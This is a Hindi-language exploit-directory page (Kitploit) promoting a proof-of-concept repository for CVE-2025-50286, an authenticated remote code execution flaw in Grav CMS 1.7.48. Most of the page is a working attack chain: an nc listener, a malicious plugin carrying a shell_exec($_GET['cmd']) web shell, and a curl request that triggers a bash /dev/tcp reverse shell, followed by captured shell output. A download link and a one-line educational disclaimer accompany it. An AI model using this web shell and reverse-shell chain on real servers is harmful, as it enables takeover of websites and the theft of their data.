Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-50286 — प्लगइन अपलोड के माध्यम से Grav CMS के लिए प्रमाणित RCE शोषण, मनमाना PHP कोड निष्पादन और रिवर्स शेल प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/binneko/cve-2025-50286
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubbinneko/cve-2025-50286

CVE-2025-50286

प्लगइन अपलोड के माध्यम से Grav CMS के लिए प्रमाणित RCE शोषण, मनमाना PHP कोड निष्पादन और रिवर्स शेल प्रदर्शित करता है।

रिपॉजिटरी देखें
2121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Grav CMS v1.7.48 / Admin Plugin v1.10.48 - प्लगइन अपलोड के माध्यम से प्रमाणित RCE (CVE-2025-50286)

Grav CMS v1.7.48 और Admin Plugin v1.10.48 'Direct Install' प्लगइन अपलोड सुविधा के माध्यम से रिमोट कोड एक्जीक्यूशन (RCE) के लिए संवेदनशील है, जो प्रमाणित प्रशासकों को सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देता है।

CVE आईडी

CVE-2025-50286

सारांश

| प्रकार: | प्रमाणित रिमोट कोड एक्जीक्यूशन (RCE) | | स्थान: | /admin/tools/direct-install (प्रशासक पैनल > उपकरण > डायरेक्ट इंस्टॉल) | | प्रभाव: | मनमाना PHP कोड निष्पादन और संभावित पूर्ण सिस्टम समझौता | | प्रमाणीकरण आवश्यक: | हाँ (प्रशासक पहुंच) | | प्रभावित संस्करण: | Grav CMS v1.7.48 / Admin Plugin v1.10.48 |

प्रमाण की अवधारणा

  1. एक लिसनर तैयार करें:

    nc -lvnp 4444
    
  2. एक प्रशासक के रूप में Grav प्रशासक पैनल में लॉग इन करें।

  3. उपकरण > डायरेक्ट इंस्टॉल पर जाएं

  4. एक दुर्भावनापूर्ण प्लगइन ZIP (evilplugin.zip) अपलोड करें, जो इस प्रकार संरचित हो:

    evilplugin/
    ├── evilplugin.php         ← शामिल है: shell_exec($_GET['cmd'])
    └── blueprints.yaml        ← सत्यापन पास करने के लिए न्यूनतम ब्लूप्रिंट
    
  5. रिवर्स शेल ट्रिगर करें:

    curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
    
  6. रिवर्स शेल प्राप्त हुआ:

    $ nc -lvnp 4444
    Listening on 0.0.0.0 4444
    Connection received on <target-ip>
    www-data@target:/var/www/html$ whoami
    www-data
    

प्रभावित घटक

  • एंडपॉइंट: /admin/tools/direct-install
  • कार्यक्षमता: बिना सत्यापन के प्लगइन अपलोड और ऑटोलोड

परीक्षण किया गया

  • Debian 11
  • Apache2 + PHP 7.4
  • Grav CMS v1.7.48 (Admin Plugin v1.10.48 के साथ)

खोजकर्ता

@binneko

संदर्भ

  • Grav CMS GitHub
  • CVE Record - CVE-2025-50286

अस्वीकरण

केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए।

टूल डाउनलोड करें